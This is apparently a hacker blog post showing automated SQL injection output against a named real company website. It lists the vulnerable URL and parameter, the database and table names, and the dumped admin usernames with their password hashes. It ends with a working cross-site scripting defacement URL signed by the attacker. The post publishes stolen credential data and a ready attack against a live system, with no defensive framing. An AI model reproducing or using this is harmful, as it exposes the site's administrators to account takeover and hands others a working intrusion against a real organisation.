Analyzing http://www.bayer.co.id/ina/cs_cp_crops.php?g_id=7
Host IP: 64.13.232.173
Web Server: Apache/2.0.54
Powered-by: PHP/4.4.9
Keyword Found: Bayer.co.id
Injection type is Integer
DB Server: MySQL
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Current DB: db42963_odniwebbay
MySQL error based injection method can be used!
Data Base Found: information_schema
Data Base Found: db42963_odniwebbay
Count(table_name) of information_schema.tables where table_schema=0x646234323936335F6F646E69776562626179 is 40
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x646234323936335F6F646E69776562626179 is 40
Table found: tb_coverage
Table found: tb_crops
Table found: tb_cropscrops
Table found: tb_cropscropsgroup
Table found: tb_cropspproblem
Table found: tb_cropsproblemgroup
Table found: tb_cropsproduct
Table found: tb_cropsproductgroup
Table found: tb_cropsrecommendation
Table found: tb_esproblem
Table found: tb_esproduct
Table found: tb_esproductgroup
Table found: tb_event
Table found: tb_eventglobal
Table found: tb_forum
Table found: tb_gbfile
Table found: tb_member
Table found: tb_microsite
Table found: tb_msds
Table found: tb_msdscat
Table found: tb_msdsparam
Table found: tb_news
Table found: tb_newscat
Table found: tb_newsmicro
Table found: tb_newsmicrocat
Table found: tb_newsstatus
Table found: tb_product
Table found: tb_productcat
Table found: tb_productdetail
Table found: tb_productfaq
Table found: tb_productgroup
Table found: tb_productpage
Table found: tb_productstatus
Table found: tb_publication
Table found: tb_publicationcat
Table found: tb_publicationstatus
Table found: tb_recommendation
Table found: tb_status
Table found: test
Table found: user
Count(column_name) of information_schema.columns where table_schema=0x646234323936335F6F646E69776562626179 and table_name=0x75736572 is 7
Column found: id
Column found: nama
Column found: username
Column found: password
Column found: group
Column found: barui
Column found: masuk
Count(*) of db42963_odniwebbay.user is 2
Data Found: =
Data Found: id=5
Data Found: nama=
Data Found: username=thinkweb
Data Found: password=35662a57ac016ee4347f69f9de647f64
Data Found: group=1
Data Found: id=7
Data Found: nama=
Data Found: username=adminbayerweb
Data Found: password=e417e24a7611b74ba3057fa945c0bde8
Data Found: group=0
XSS Vulnerability
Code:
http://www.bayer.co.id/ina/cs_cp_crops.php?g_id=%3Ctitle%3EXSSed+by+RahZEROV%3C%2Ftitle%3E%3Ch1%3E%3C%2Fh1%3E%3Ch1%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3EXSSed+by%3C%2Fcenter%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3Cb%3ERahZEROV%3C%2Fb%3E%3C%2Fcenter%3E%3C%2Fh1%3E%3Cstyle%3E+html+{%20background-image:%20url%28http://www.cyber4rt.com/logo.gif%29;}
0 komentar on SQL Injection And XSS Vulnerability on BAYER.CO.ID :
Post a Comment and Don't Spam!